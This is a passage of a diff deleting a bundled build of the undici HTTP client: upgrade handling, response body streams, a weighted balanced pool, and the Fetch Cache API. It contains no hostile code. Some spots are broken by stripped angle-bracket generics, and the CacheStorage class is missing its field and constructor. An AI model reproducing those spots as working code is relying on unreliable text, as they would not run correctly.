util.parseHeaders(rawHeaders) - this.runInAsyncScope(callback, null, null, { - headers, - socket, - opaque, - context - }) - } - - onError (err) { - const { callback, opaque } = this - - removeSignal(this) - - if (callback) { - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - } -} - -function upgrade (opts, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - upgrade.call(this, opts, (err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - try { - const upgradeHandler = new UpgradeHandler(opts, callback) - this.dispatch({ - ...opts, - method: opts.method || 'GET', - upgrade: opts.protocol || 'Websocket' - }, upgradeHandler) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = upgrade - - -/***/ }), - -/***/ 4059: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -module.exports.request = __nccwpck_require__(5448) -module.exports.stream = __nccwpck_require__(5395) -module.exports.pipeline = __nccwpck_require__(8752) -module.exports.upgrade = __nccwpck_require__(6923) -module.exports.connect = __nccwpck_require__(9744) - - -/***/ }), - -/***/ 3858: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// Ported from https://github.com/nodejs/undici/pull/907 - - - -const assert = __nccwpck_require__(9491) -const { Readable } = __nccwpck_require__(2781) -const { RequestAbortedError, NotSupportedError, InvalidArgumentError } = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { ReadableStreamFrom, toUSVString } = __nccwpck_require__(3983) - -let Blob - -const kConsume = Symbol('kConsume') -const kReading = Symbol('kReading') -const kBody = Symbol('kBody') -const kAbort = Symbol('abort') -const kContentType = Symbol('kContentType') - -const noop = () => {} - -module.exports = class BodyReadable extends Readable { - constructor ({ - resume, - abort, - contentType = '', - highWaterMark = 64 * 1024 // Same as nodejs fs streams. - }) { - super({ - autoDestroy: true, - read: resume, - highWaterMark - }) - - this._readableState.dataEmitted = false - - this[kAbort] = abort - this[kConsume] = null - this[kBody] = null - this[kContentType] = contentType - - // Is stream being consumed through Readable API? - // This is an optimization so that we avoid checking - // for 'data' and 'readable' listeners in the hot path - // inside push(). - this[kReading] = false - } - - destroy (err) { - if (this.destroyed) { - // Node < 16 - return this - } - - if (!err && !this._readableState.endEmitted) { - err = new RequestAbortedError() - } - - if (err) { - this[kAbort]() - } - - return super.destroy(err) - } - - emit (ev, ...args) { - if (ev === 'data') { - // Node < 16.7 - this._readableState.dataEmitted = true - } else if (ev === 'error') { - // Node < 16 - this._readableState.errorEmitted = true - } - return super.emit(ev, ...args) - } - - on (ev, ...args) { - if (ev === 'data' || ev === 'readable') { - this[kReading] = true - } - return super.on(ev, ...args) - } - - addListener (ev, ...args) { - return this.on(ev, ...args) - } - - off (ev, ...args) { - const ret = super.off(ev, ...args) - if (ev === 'data' || ev === 'readable') { - this[kReading] = ( - this.listenerCount('data') > 0 || - this.listenerCount('readable') > 0 - ) - } - return ret - } - - removeListener (ev, ...args) { - return this.off(ev, ...args) - } - - push (chunk) { - if (this[kConsume] && chunk !== null && this.readableLength === 0) { - consumePush(this[kConsume], chunk) - return this[kReading] ? super.push(chunk) : true - } - return super.push(chunk) - } - - // https://fetch.spec.whatwg.org/#dom-body-text - async text () { - return consume(this, 'text') - } - - // https://fetch.spec.whatwg.org/#dom-body-json - async json () { - return consume(this, 'json') - } - - // https://fetch.spec.whatwg.org/#dom-body-blob - async blob () { - return consume(this, 'blob') - } - - // https://fetch.spec.whatwg.org/#dom-body-arraybuffer - async arrayBuffer () { - return consume(this, 'arrayBuffer') - } - - // https://fetch.spec.whatwg.org/#dom-body-formdata - async formData () { - // TODO: Implement. - throw new NotSupportedError() - } - - // https://fetch.spec.whatwg.org/#dom-body-bodyused - get bodyUsed () { - return util.isDisturbed(this) - } - - // https://fetch.spec.whatwg.org/#dom-body-body - get body () { - if (!this[kBody]) { - this[kBody] = ReadableStreamFrom(this) - if (this[kConsume]) { - // TODO: Is this the best way to force a lock? - this[kBody].getReader() // Ensure stream is locked. - assert(this[kBody].locked) - } - } - return this[kBody] - } - - dump (opts) { - let limit = opts && Number.isFinite(opts.limit) ? opts.limit : 262144 - const signal = opts && opts.signal - - if (signal) { - try { - if (typeof signal !== 'object' || !('aborted' in signal)) { - throw new InvalidArgumentError('signal must be an AbortSignal') - } - util.throwIfAborted(signal) - } catch (err) { - return Promise.reject(err) - } - } - - if (this.closed) { - return Promise.resolve(null) - } - - return new Promise((resolve, reject) => { - const signalListenerCleanup = signal - ? util.addAbortListener(signal, () => { - this.destroy() - }) - : noop - - this - .on('close', function () { - signalListenerCleanup() - if (signal && signal.aborted) { - reject(signal.reason || Object.assign(new Error('The operation was aborted'), { name: 'AbortError' })) - } else { - resolve(null) - } - }) - .on('error', noop) - .on('data', function (chunk) { - limit -= chunk.length - if (limit <= 0) { - this.destroy() - } - }) - .resume() - }) - } -} - -// https://streams.spec.whatwg.org/#readablestream-locked -function isLocked (self) { - // Consume is an implicit lock. - return (self[kBody] && self[kBody].locked === true) || self[kConsume] -} - -// https://fetch.spec.whatwg.org/#body-unusable -function isUnusable (self) { - return util.isDisturbed(self) || isLocked(self) -} - -async function consume (stream, type) { - if (isUnusable(stream)) { - throw new TypeError('unusable') - } - - assert(!stream[kConsume]) - - return new Promise((resolve, reject) => { - stream[kConsume] = { - type, - stream, - resolve, - reject, - length: 0, - body: [] - } - - stream - .on('error', function (err) { - consumeFinish(this[kConsume], err) - }) - .on('close', function () { - if (this[kConsume].body !== null) { - consumeFinish(this[kConsume], new RequestAbortedError()) - } - }) - - process.nextTick(consumeStart, stream[kConsume]) - }) -} - -function consumeStart (consume) { - if (consume.body === null) { - return - } - - const { _readableState: state } = consume.stream - - for (const chunk of state.buffer) { - consumePush(consume, chunk) - } - - if (state.endEmitted) { - consumeEnd(this[kConsume]) - } else { - consume.stream.on('end', function () { - consumeEnd(this[kConsume]) - }) - } - - consume.stream.resume() - - while (consume.stream.read() != null) { - // Loop - } -} - -function consumeEnd (consume) { - const { type, body, resolve, stream, length } = consume - - try { - if (type === 'text') { - resolve(toUSVString(Buffer.concat(body))) - } else if (type === 'json') { - resolve(JSON.parse(Buffer.concat(body))) - } else if (type === 'arrayBuffer') { - const dst = new Uint8Array(length) - - let pos = 0 - for (const buf of body) { - dst.set(buf, pos) - pos += buf.byteLength - } - - resolve(dst.buffer) - } else if (type === 'blob') { - if (!Blob) { - Blob = (__nccwpck_require__(4300).Blob) - } - resolve(new Blob(body, { type: stream[kContentType] })) - } - - consumeFinish(consume) - } catch (err) { - stream.destroy(err) - } -} - -function consumePush (consume, chunk) { - consume.length += chunk.length - consume.body.push(chunk) -} - -function consumeFinish (consume, err) { - if (consume.body === null) { - return - } - - if (err) { - consume.reject(err) - } else { - consume.resolve() - } - - consume.type = null - consume.stream = null - consume.resolve = null - consume.reject = null - consume.length = 0 - consume.body = null -} - - -/***/ }), - -/***/ 7474: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const assert = __nccwpck_require__(9491) -const { - ResponseStatusCodeError -} = __nccwpck_require__(8045) -const { toUSVString } = __nccwpck_require__(3983) - -async function getResolveErrorBodyCallback ({ callback, body, contentType, statusCode, statusMessage, headers }) { - assert(body) - - let chunks = [] - let limit = 0 - - for await (const chunk of body) { - chunks.push(chunk) - limit += chunk.length - if (limit > 128 * 1024) { - chunks = null - break - } - } - - if (statusCode === 204 || !contentType || !chunks) { - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) - return - } - - try { - if (contentType.startsWith('application/json')) { - const payload = JSON.parse(toUSVString(Buffer.concat(chunks))) - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers, payload)) - return - } - - if (contentType.startsWith('text/')) { - const payload = toUSVString(Buffer.concat(chunks)) - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers, payload)) - return - } - } catch (err) { - // Process in a fallback if error - } - - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) -} - -module.exports = { getResolveErrorBodyCallback } - - -/***/ }), - -/***/ 7931: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - BalancedPoolMissingUpstreamError, - InvalidArgumentError -} = __nccwpck_require__(8045) -const { - PoolBase, - kClients, - kNeedDrain, - kAddClient, - kRemoveClient, - kGetDispatcher -} = __nccwpck_require__(3198) -const Pool = __nccwpck_require__(4634) -const { kUrl, kInterceptors } = __nccwpck_require__(2785) -const { parseOrigin } = __nccwpck_require__(3983) -const kFactory = Symbol('factory') - -const kOptions = Symbol('options') -const kGreatestCommonDivisor = Symbol('kGreatestCommonDivisor') -const kCurrentWeight = Symbol('kCurrentWeight') -const kIndex = Symbol('kIndex') -const kWeight = Symbol('kWeight') -const kMaxWeightPerServer = Symbol('kMaxWeightPerServer') -const kErrorPenalty = Symbol('kErrorPenalty') - -function getGreatestCommonDivisor (a, b) { - if (b === 0) return a - return getGreatestCommonDivisor(b, a % b) -} - -function defaultFactory (origin, opts) { - return new Pool(origin, opts) -} - -class BalancedPool extends PoolBase { - constructor (upstreams = [], { factory = defaultFactory, ...opts } = {}) { - super() - - this[kOptions] = opts - this[kIndex] = -1 - this[kCurrentWeight] = 0 - - this[kMaxWeightPerServer] = this[kOptions].maxWeightPerServer || 100 - this[kErrorPenalty] = this[kOptions].errorPenalty || 15 - - if (!Array.isArray(upstreams)) { - upstreams = [upstreams] - } - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('factory must be a function.') - } - - this[kInterceptors] = opts.interceptors && opts.interceptors.BalancedPool && Array.isArray(opts.interceptors.BalancedPool) - ? opts.interceptors.BalancedPool - : [] - this[kFactory] = factory - - for (const upstream of upstreams) { - this.addUpstream(upstream) - } - this._updateBalancedPoolStats() - } - - addUpstream (upstream) { - const upstreamOrigin = parseOrigin(upstream).origin - - if (this[kClients].find((pool) => ( - pool[kUrl].origin === upstreamOrigin && - pool.closed !== true && - pool.destroyed !== true - ))) { - return this - } - const pool = this[kFactory](upstreamOrigin, Object.assign({}, this[kOptions])) - - this[kAddClient](pool) - pool.on('connect', () => { - pool[kWeight] = Math.min(this[kMaxWeightPerServer], pool[kWeight] + this[kErrorPenalty]) - }) - - pool.on('connectionError', () => { - pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) - this._updateBalancedPoolStats() - }) - - pool.on('disconnect', (...args) => { - const err = args[2] - if (err && err.code === 'UND_ERR_SOCKET') { - // decrease the weight of the pool. - pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) - this._updateBalancedPoolStats() - } - }) - - for (const client of this[kClients]) { - client[kWeight] = this[kMaxWeightPerServer] - } - - this._updateBalancedPoolStats() - - return this - } - - _updateBalancedPoolStats () { - this[kGreatestCommonDivisor] = this[kClients].map(p => p[kWeight]).reduce(getGreatestCommonDivisor, 0) - } - - removeUpstream (upstream) { - const upstreamOrigin = parseOrigin(upstream).origin - - const pool = this[kClients].find((pool) => ( - pool[kUrl].origin === upstreamOrigin && - pool.closed !== true && - pool.destroyed !== true - )) - - if (pool) { - this[kRemoveClient](pool) - } - - return this - } - - get upstreams () { - return this[kClients] - .filter(dispatcher => dispatcher.closed !== true && dispatcher.destroyed !== true) - .map((p) => p[kUrl].origin) - } - - [kGetDispatcher] () { - // We validate that pools is greater than 0, - // otherwise we would have to wait until an upstream - // is added, which might never happen. - if (this[kClients].length === 0) { - throw new BalancedPoolMissingUpstreamError() - } - - const dispatcher = this[kClients].find(dispatcher => ( - !dispatcher[kNeedDrain] && - dispatcher.closed !== true && - dispatcher.destroyed !== true - )) - - if (!dispatcher) { - return - } - - const allClientsBusy = this[kClients].map(pool => pool[kNeedDrain]).reduce((a, b) => a && b, true) - - if (allClientsBusy) { - return - } - - let counter = 0 - - let maxWeightIndex = this[kClients].findIndex(pool => !pool[kNeedDrain]) - - while (counter++ < this[kClients].length) { - this[kIndex] = (this[kIndex] + 1) % this[kClients].length - const pool = this[kClients][this[kIndex]] - - // find pool index with the largest weight - if (pool[kWeight] > this[kClients][maxWeightIndex][kWeight] && !pool[kNeedDrain]) { - maxWeightIndex = this[kIndex] - } - - // decrease the current weight every `this[kClients].length`. - if (this[kIndex] === 0) { - // Set the current weight to the next lower weight. - this[kCurrentWeight] = this[kCurrentWeight] - this[kGreatestCommonDivisor] - - if (this[kCurrentWeight] <= 0) { - this[kCurrentWeight] = this[kMaxWeightPerServer] - } - } - if (pool[kWeight] >= this[kCurrentWeight] && (!pool[kNeedDrain])) { - return pool - } - } - - this[kCurrentWeight] = this[kClients][maxWeightIndex][kWeight] - this[kIndex] = maxWeightIndex - return this[kClients][maxWeightIndex] - } -} - -module.exports = BalancedPool - - -/***/ }), - -/***/ 6101: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kConstruct } = __nccwpck_require__(9174) -const { urlEquals, fieldValues: getFieldValues } = __nccwpck_require__(2396) -const { kEnumerableProperty, isDisturbed } = __nccwpck_require__(3983) -const { kHeadersList } = __nccwpck_require__(2785) -const { webidl } = __nccwpck_require__(1744) -const { Response, cloneResponse } = __nccwpck_require__(7823) -const { Request } = __nccwpck_require__(8359) -const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) -const { fetching } = __nccwpck_require__(4881) -const { urlIsHttpHttpsScheme, createDeferredPromise, readAllBytes } = __nccwpck_require__(2538) -const assert = __nccwpck_require__(9491) -const { getGlobalDispatcher } = __nccwpck_require__(1892) - -/** - * @see https://w3c.github.io/ServiceWorker/#dfn-cache-batch-operation - * @typedef {Object} CacheBatchOperation - * @property {'delete' | 'put'} type - * @property {any} request - * @property {any} response - * @property {import('../../types/cache').CacheQueryOptions} options - */ - -/** - * @see https://w3c.github.io/ServiceWorker/#dfn-request-response-list - * @typedef {[any, any][]} requestResponseList - */ - -class Cache { - /** - * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-request-response-list - * @type {requestResponseList} - */ - #relevantRequestResponseList - - constructor () { - if (arguments[0] !== kConstruct) { - webidl.illegalConstructor() - } - - this.#relevantRequestResponseList = arguments[1] - } - - async match (request, options = {}) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.match' }) - - request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - const p = await this.matchAll(request, options) - - if (p.length === 0) { - return - } - - return p[0] - } - - async matchAll (request = undefined, options = {}) { - webidl.brandCheck(this, Cache) - - if (request !== undefined) request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - // 1. - let r = null - - // 2. - if (request !== undefined) { - if (request instanceof Request) { - // 2.1.1 - r = request[kState] - - // 2.1.2 - if (r.method !== 'GET' && !options.ignoreMethod) { - return [] - } - } else if (typeof request === 'string') { - // 2.2.1 - r = new Request(request)[kState] - } - } - - // 5. - // 5.1 - const responses = [] - - // 5.2 - if (request === undefined) { - // 5.2.1 - for (const requestResponse of this.#relevantRequestResponseList) { - responses.push(requestResponse[1]) - } - } else { // 5.3 - // 5.3.1 - const requestResponses = this.#queryCache(r, options) - - // 5.3.2 - for (const requestResponse of requestResponses) { - responses.push(requestResponse[1]) - } - } - - // 5.4 - // We don't implement CORs so we don't need to loop over the responses, yay! - - // 5.5.1 - const responseList = [] - - // 5.5.2 - for (const response of responses) { - // 5.5.2.1 - const responseObject = new Response(response.body?.source ?? null) - const body = responseObject[kState].body - responseObject[kState] = response - responseObject[kState].body = body - responseObject[kHeaders][kHeadersList] = response.headersList - responseObject[kHeaders][kGuard] = 'immutable' - - responseList.push(responseObject) - } - - // 6. - return Object.freeze(responseList) - } - - async add (request) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.add' }) - - request = webidl.converters.RequestInfo(request) - - // 1. - const requests = [request] - - // 2. - const responseArrayPromise = this.addAll(requests) - - // 3. - return await responseArrayPromise - } - - async addAll (requests) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.addAll' }) - - requests = webidl.converters['sequence'](requests) - - // 1. - const responsePromises = [] - - // 2. - const requestList = [] - - // 3. - for (const request of requests) { - if (typeof request === 'string') { - continue - } - - // 3.1 - const r = request[kState] - - // 3.2 - if (!urlIsHttpHttpsScheme(r.url) || r.method !== 'GET') { - throw webidl.errors.exception({ - header: 'Cache.addAll', - message: 'Expected http/s scheme when method is not GET.' - }) - } - } - - // 4. - /** @type {ReturnType[]} */ - const fetchControllers = [] - - // 5. - for (const request of requests) { - // 5.1 - const r = new Request(request)[kState] - - // 5.2 - if (!urlIsHttpHttpsScheme(r.url)) { - throw webidl.errors.exception({ - header: 'Cache.addAll', - message: 'Expected http/s scheme.' - }) - } - - // 5.4 - r.initiator = 'fetch' - r.destination = 'subresource' - - // 5.5 - requestList.push(r) - - // 5.6 - const responsePromise = createDeferredPromise() - - // 5.7 - fetchControllers.push(fetching({ - request: r, - dispatcher: getGlobalDispatcher(), - processResponse (response) { - // 1. - if (response.type === 'error' || response.status === 206 || response.status < 200 || response.status > 299) { - responsePromise.reject(webidl.errors.exception({ - header: 'Cache.addAll', - message: 'Received an invalid status code or the request failed.' - })) - } else if (response.headersList.contains('vary')) { // 2. - // 2.1 - const fieldValues = getFieldValues(response.headersList.get('vary')) - - // 2.2 - for (const fieldValue of fieldValues) { - // 2.2.1 - if (fieldValue === '*') { - responsePromise.reject(webidl.errors.exception({ - header: 'Cache.addAll', - message: 'invalid vary field value' - })) - - for (const controller of fetchControllers) { - controller.abort() - } - - return - } - } - } - }, - processResponseEndOfBody (response) { - // 1. - if (response.aborted) { - responsePromise.reject(new DOMException('aborted', 'AbortError')) - return - } - - // 2. - responsePromise.resolve(response) - } - })) - - // 5.8 - responsePromises.push(responsePromise.promise) - } - - // 6. - const p = Promise.all(responsePromises) - - // 7. - const responses = await p - - // 7.1 - const operations = [] - - // 7.2 - let index = 0 - - // 7.3 - for (const response of responses) { - // 7.3.1 - /** @type {CacheBatchOperation} */ - const operation = { - type: 'put', // 7.3.2 - request: requestList[index], // 7.3.3 - response // 7.3.4 - } - - operations.push(operation) // 7.3.5 - - index++ // 7.3.6 - } - - // 7.5 - const cacheJobPromise = createDeferredPromise() - - // 7.6.1 - let errorData = null - - // 7.6.2 - try { - this.#batchCacheOperations(operations) - } catch (e) { - errorData = e - } - - // 7.6.3 - queueMicrotask(() => { - // 7.6.3.1 - if (errorData === null) { - cacheJobPromise.resolve(undefined) - } else { - // 7.6.3.2 - cacheJobPromise.reject(errorData) - } - }) - - // 7.7 - return cacheJobPromise.promise - } - - async put (request, response) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 2, { header: 'Cache.put' }) - - request = webidl.converters.RequestInfo(request) - response = webidl.converters.Response(response) - - // 1. - let innerRequest = null - - // 2. - if (request instanceof Request) { - innerRequest = request[kState] - } else { // 3. - innerRequest = new Request(request)[kState] - } - - // 4. - if (!urlIsHttpHttpsScheme(innerRequest.url) || innerRequest.method !== 'GET') { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Expected an http/s scheme when method is not GET' - }) - } - - // 5. - const innerResponse = response[kState] - - // 6. - if (innerResponse.status === 206) { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Got 206 status' - }) - } - - // 7. - if (innerResponse.headersList.contains('vary')) { - // 7.1. - const fieldValues = getFieldValues(innerResponse.headersList.get('vary')) - - // 7.2. - for (const fieldValue of fieldValues) { - // 7.2.1 - if (fieldValue === '*') { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Got * vary field value' - }) - } - } - } - - // 8. - if (innerResponse.body && (isDisturbed(innerResponse.body.stream) || innerResponse.body.stream.locked)) { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Response body is locked or disturbed' - }) - } - - // 9. - const clonedResponse = cloneResponse(innerResponse) - - // 10. - const bodyReadPromise = createDeferredPromise() - - // 11. - if (innerResponse.body != null) { - // 11.1 - const stream = innerResponse.body.stream - - // 11.2 - const reader = stream.getReader() - - // 11.3 - readAllBytes(reader).then(bodyReadPromise.resolve, bodyReadPromise.reject) - } else { - bodyReadPromise.resolve(undefined) - } - - // 12. - /** @type {CacheBatchOperation[]} */ - const operations = [] - - // 13. - /** @type {CacheBatchOperation} */ - const operation = { - type: 'put', // 14. - request: innerRequest, // 15. - response: clonedResponse // 16. - } - - // 17. - operations.push(operation) - - // 19. - const bytes = await bodyReadPromise.promise - - if (clonedResponse.body != null) { - clonedResponse.body.source = bytes - } - - // 19.1 - const cacheJobPromise = createDeferredPromise() - - // 19.2.1 - let errorData = null - - // 19.2.2 - try { - this.#batchCacheOperations(operations) - } catch (e) { - errorData = e - } - - // 19.2.3 - queueMicrotask(() => { - // 19.2.3.1 - if (errorData === null) { - cacheJobPromise.resolve() - } else { // 19.2.3.2 - cacheJobPromise.reject(errorData) - } - }) - - return cacheJobPromise.promise - } - - async delete (request, options = {}) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.delete' }) - - request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - /** - * @type {Request} - */ - let r = null - - if (request instanceof Request) { - r = request[kState] - - if (r.method !== 'GET' && !options.ignoreMethod) { - return false - } - } else { - assert(typeof request === 'string') - - r = new Request(request)[kState] - } - - /** @type {CacheBatchOperation[]} */ - const operations = [] - - /** @type {CacheBatchOperation} */ - const operation = { - type: 'delete', - request: r, - options - } - - operations.push(operation) - - const cacheJobPromise = createDeferredPromise() - - let errorData = null - let requestResponses - - try { - requestResponses = this.#batchCacheOperations(operations) - } catch (e) { - errorData = e - } - - queueMicrotask(() => { - if (errorData === null) { - cacheJobPromise.resolve(!!requestResponses?.length) - } else { - cacheJobPromise.reject(errorData) - } - }) - - return cacheJobPromise.promise - } - - /** - * @see https://w3c.github.io/ServiceWorker/#dom-cache-keys - * @param {any} request - * @param {import('../../types/cache').CacheQueryOptions} options - * @returns {readonly Request[]} - */ - async keys (request = undefined, options = {}) { - webidl.brandCheck(this, Cache) - - if (request !== undefined) request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - // 1. - let r = null - - // 2. - if (request !== undefined) { - // 2.1 - if (request instanceof Request) { - // 2.1.1 - r = request[kState] - - // 2.1.2 - if (r.method !== 'GET' && !options.ignoreMethod) { - return [] - } - } else if (typeof request === 'string') { // 2.2 - r = new Request(request)[kState] - } - } - - // 4. - const promise = createDeferredPromise() - - // 5. - // 5.1 - const requests = [] - - // 5.2 - if (request === undefined) { - // 5.2.1 - for (const requestResponse of this.#relevantRequestResponseList) { - // 5.2.1.1 - requests.push(requestResponse[0]) - } - } else { // 5.3 - // 5.3.1 - const requestResponses = this.#queryCache(r, options) - - // 5.3.2 - for (const requestResponse of requestResponses) { - // 5.3.2.1 - requests.push(requestResponse[0]) - } - } - - // 5.4 - queueMicrotask(() => { - // 5.4.1 - const requestList = [] - - // 5.4.2 - for (const request of requests) { - const requestObject = new Request('https://a') - requestObject[kState] = request - requestObject[kHeaders][kHeadersList] = request.headersList - requestObject[kHeaders][kGuard] = 'immutable' - requestObject[kRealm] = request.client - - // 5.4.2.1 - requestList.push(requestObject) - } - - // 5.4.3 - promise.resolve(Object.freeze(requestList)) - }) - - return promise.promise - } - - /** - * @see https://w3c.github.io/ServiceWorker/#batch-cache-operations-algorithm - * @param {CacheBatchOperation[]} operations - * @returns {requestResponseList} - */ - #batchCacheOperations (operations) { - // 1. - const cache = this.#relevantRequestResponseList - - // 2. - const backupCache = [...cache] - - // 3. - const addedItems = [] - - // 4.1 - const resultList = [] - - try { - // 4.2 - for (const operation of operations) { - // 4.2.1 - if (operation.type !== 'delete' && operation.type !== 'put') { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'operation type does not match "delete" or "put"' - }) - } - - // 4.2.2 - if (operation.type === 'delete' && operation.response != null) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'delete operation should not have an associated response' - }) - } - - // 4.2.3 - if (this.#queryCache(operation.request, operation.options, addedItems).length) { - throw new DOMException('???', 'InvalidStateError') - } - - // 4.2.4 - let requestResponses - - // 4.2.5 - if (operation.type === 'delete') { - // 4.2.5.1 - requestResponses = this.#queryCache(operation.request, operation.options) - - // TODO: the spec is wrong, this is needed to pass WPTs - if (requestResponses.length === 0) { - return [] - } - - // 4.2.5.2 - for (const requestResponse of requestResponses) { - const idx = cache.indexOf(requestResponse) - assert(idx !== -1) - - // 4.2.5.2.1 - cache.splice(idx, 1) - } - } else if (operation.type === 'put') { // 4.2.6 - // 4.2.6.1 - if (operation.response == null) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'put operation should have an associated response' - }) - } - - // 4.2.6.2 - const r = operation.request - - // 4.2.6.3 - if (!urlIsHttpHttpsScheme(r.url)) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'expected http or https scheme' - }) - } - - // 4.2.6.4 - if (r.method !== 'GET') { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'not get method' - }) - } - - // 4.2.6.5 - if (operation.options != null) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'options must not be defined' - }) - } - - // 4.2.6.6 - requestResponses = this.#queryCache(operation.request) - - // 4.2.6.7 - for (const requestResponse of requestResponses) { - const idx = cache.indexOf(requestResponse) - assert(idx !== -1) - - // 4.2.6.7.1 - cache.splice(idx, 1) - } - - // 4.2.6.8 - cache.push([operation.request, operation.response]) - - // 4.2.6.10 - addedItems.push([operation.request, operation.response]) - } - - // 4.2.7 - resultList.push([operation.request, operation.response]) - } - - // 4.3 - return resultList - } catch (e) { // 5. - // 5.1 - this.#relevantRequestResponseList.length = 0 - - // 5.2 - this.#relevantRequestResponseList = backupCache - - // 5.3 - throw e - } - } - - /** - * @see https://w3c.github.io/ServiceWorker/#query-cache - * @param {any} requestQuery - * @param {import('../../types/cache').CacheQueryOptions} options - * @param {requestResponseList} targetStorage - * @returns {requestResponseList} - */ - #queryCache (requestQuery, options, targetStorage) { - /** @type {requestResponseList} */ - const resultList = [] - - const storage = targetStorage ?? this.#relevantRequestResponseList - - for (const requestResponse of storage) { - const [cachedRequest, cachedResponse] = requestResponse - if (this.#requestMatchesCachedItem(requestQuery, cachedRequest, cachedResponse, options)) { - resultList.push(requestResponse) - } - } - - return resultList - } - - /** - * @see https://w3c.github.io/ServiceWorker/#request-matches-cached-item-algorithm - * @param {any} requestQuery - * @param {any} request - * @param {any | null} response - * @param {import('../../types/cache').CacheQueryOptions | undefined} options - * @returns {boolean} - */ - #requestMatchesCachedItem (requestQuery, request, response = null, options) { - // if (options?.ignoreMethod === false && request.method === 'GET') { - // return false - // } - - const queryURL = new URL(requestQuery.url) - - const cachedURL = new URL(request.url) - - if (options?.ignoreSearch) { - cachedURL.search = '' - - queryURL.search = '' - } - - if (!urlEquals(queryURL, cachedURL, true)) { - return false - } - - if ( - response == null || - options?.ignoreVary || - !response.headersList.contains('vary') - ) { - return true - } - - const fieldValues = getFieldValues(response.headersList.get('vary')) - - for (const fieldValue of fieldValues) { - if (fieldValue === '*') { - return false - } - - const requestValue = request.headersList.get(fieldValue) - const queryValue = requestQuery.headersList.get(fieldValue) - - // If one has the header and the other doesn't, or one has - // a different value than the other, return false - if (requestValue !== queryValue) { - return false - } - } - - return true - } -} - -Object.defineProperties(Cache.prototype, { - [Symbol.toStringTag]: { - value: 'Cache', - configurable: true - }, - match: kEnumerableProperty, - matchAll: kEnumerableProperty, - add: kEnumerableProperty, - addAll: kEnumerableProperty, - put: kEnumerableProperty, - delete: kEnumerableProperty, - keys: kEnumerableProperty -}) - -const cacheQueryOptionConverters = [ - { - key: 'ignoreSearch', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'ignoreMethod', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'ignoreVary', - converter: webidl.converters.boolean, - defaultValue: false - } -] - -webidl.converters.CacheQueryOptions = webidl.dictionaryConverter(cacheQueryOptionConverters) - -webidl.converters.MultiCacheQueryOptions = webidl.dictionaryConverter([ - ...cacheQueryOptionConverters, - { - key: 'cacheName', - converter: webidl.converters.DOMString - } -]) - -webidl.converters.Response = webidl.interfaceConverter(Response) - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.RequestInfo -) - -module.exports = { - Cache -} - - -/***/ }), - -/***/ 7907: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kConstruct } = __nccwpck_require__(9174) -const { Cache } = __nccwpck_require__(6101) -const { webidl } = __nccwpck_require__(1744) -const { kEnumerableProperty } = __nccwpck_require__(3983) - -class CacheStorage { - /** - * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-name-to-cache-map - * @type {Map} - */ - async has (cacheName) { - webidl.brandCheck(this, CacheStorage) - webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.has' }) - - cacheName = webidl.converters.DOMString(cacheName) - - // 2.1.1 - // 2.2 - return this.#caches.has(cacheName) - } - - /** - * @see https://w3c.github.io/ServiceWorker/#dom-cachestorage-open - * @param {string} cacheName - * @returns {Promise} - */ - async open (cacheName) { - webidl.brandCheck(this, CacheStorage) - webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.open' }) - - cacheName = 